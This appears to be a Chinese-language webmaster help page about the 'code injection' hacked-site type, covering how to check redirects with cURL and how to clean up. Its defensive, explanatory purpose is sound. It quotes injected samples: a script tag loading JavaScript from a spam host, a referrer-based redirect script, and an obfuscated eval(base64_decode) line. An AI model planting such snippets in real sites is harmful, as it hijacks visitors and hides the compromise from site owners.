被黑类型:代码注入

如果 Search Console 中有网页标记为“代码注入”这种被黑客入侵的网站类型,这表示什么?

这表示黑客已入侵了您的网站,并将访问者从您的网站重定向到黑客的垃圾内容网站。有时候,黑客会根据用户的位置、引荐网站或所用的设备(如手机),仅对某些特定用户进行重定向。黑客可能已将恶意代码直接注入您网站的 HTML 文件(例如 JavaScript 重定向)中或用于生成您网站内容的文件(例如 PHP 文件)中。黑客用来重定向访问者的另一种方法是修改您服务器的配置文件。服务器配置文件通常会允许网站管理员针对网站上的特定网页或目录指定网址重定向。例如,在 Apache 服务器上,配置文件为 .htaccess 文件以及 httpd.conf(如果您不熟悉如何检查服务器的配置文件,请参阅“针对被黑客入侵的网站的帮助”恢复流程中的第 2 步:组建支持团队)。

要了解关于遭垃圾内容入侵的网站的更多常规信息,请参阅第 5 步:评估受破坏程度(遭垃圾内容入侵)

如何调查此类网页上的重定向?

首先,避免使用浏览器来查看您网站上被黑客入侵的网页。这是因为黑客通常会将网页配置为根据如下一些用户特征进行重定向:

  • 地址(通常根据 IP 地址推断)
  • 引荐来源网址(如搜索结果页)
  • 用户代理(如手机或安全性较低的浏览器)

请考虑改用以下方法确认重定向行为:

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • 如果抓取的网页包含了遭到入侵的服务器配置文件,就可能会返回如下标头:

    ...
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    或者,在检查返回网页的内容时,您可能会发现如下注入代码:

    • 从垃圾内容网站调用并运行脚本的 JavaScript 或其他脚本语言: <script type='text/javascript' src='http://spam-site/js/x55.js'></script>
    • 将浏览器重定向到垃圾内容网站的脚本:
      
      <script>
      if (document.referrer.match(/google\.com/)) { window.location("http://spam-site/"); } </script>
    • 试图躲避检测的迷惑性垃圾内容代码:
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    调查网站上可能存在的所有可疑代码。搜索“script”字样可能有助于找出 JavaScript 代码。其他实用的关键字还包括“eval”、“unescape”等。

    如何清理属于“代码注入”被黑类型的网站?

    当您准备好清理网站(请参阅“针对被黑客入侵的网站的帮助”恢复流程中的第 7 步)后,可以将受影响的文件替换为最近的一个正常备份文件,也可以从各网页以及所有相关的脚本函数和文件中移除相应的代码注入内容。如果您修改了服务器配置文件,可能需要重新启动网络服务器才能使更改生效。

    请注意,清理“代码注入”被黑类型网站虽然有助于恢复被黑客入侵的网站,但是并不能修复导致黑客在一开始入侵您网站的潜在漏洞。如果不解决根本问题,您的网站在将来还会再次被黑客入侵。举例而言,一种实用方法就是更新您网站上运行的所有软件,例如旧版的 WordPress。要详细了解如何清理整个网站(而不只是这种被黑类型),请参阅“针对被黑客入侵的网站的帮助”,尤其是第 5 步:评估受破坏程度(遭垃圾内容入侵)中的“文件系统受破坏程度评估”。

    该内容对您有帮助吗?
    您有什么改进建议?